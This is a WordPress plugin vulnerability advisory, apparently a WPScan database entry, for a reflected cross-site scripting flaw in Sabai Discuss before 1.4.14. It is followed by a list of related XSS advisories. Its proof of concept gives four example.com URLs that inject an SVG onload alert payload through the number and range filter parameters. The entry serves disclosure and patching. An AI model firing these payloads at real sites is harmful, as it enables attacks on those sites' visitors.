Sabai Discuss < 1.4.14 – Reflected Cross Site Scripting | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape some parameters before outputting them back in the page when number filters are enabled, leading to Reflected Cross-Site Scripting

Proof of Concept

https://example.com/questions?category=77&filter=1&field_number[min]="><svg/onload=alert(/XSS/)>
https://example.com/questions?category=77&filter=1&field_number[max]="><svg/onload=alert(/XSS/)>
https://example.com/questions?category=77&filter=1&field_range[min]="><svg/onload=alert(/XSS/)>
https://example.com/questions?category=77&filter=1&field_range[max]="><svg/onload=alert(/XSS/)>

Affects Plugins

Fixed in 1.4.14

References

URL

https://packetstormsecurity.com/files/#168500/

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

CraCkEr

Verified

Yes

WPVDB ID

d59d2e66-5158-4ee7-a56f-5ab2f104685b

Timeline

Publicly Published

2022-09-26 (about 3 years ago)

Added

2022-10-05 (about 3 years ago)

Last Updated

2022-10-05 (about 3 years ago)

Other

Published

Title

Published

2024-12-23

Title

Email Subscribers < 5.7.45 - Admin+ Stored XSS

Published

2024-02-02

Title

PT Sign Ups <= 1.0.4 - Unauthenticated Stored Cross-Site Scripting

Published

2026-04-17

Title

Youzify < 1.3.7 - Authenticated (Subscriber+) Stored Cross-Site Scripting via 'checkin_place_id' Parameter

Published

2025-08-19

Title

Markup Markdown < 3.20.7 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2022-04-11

Title

Responsive Tabs < 4.0.6 - Author+ Stored Cross-Site Scripting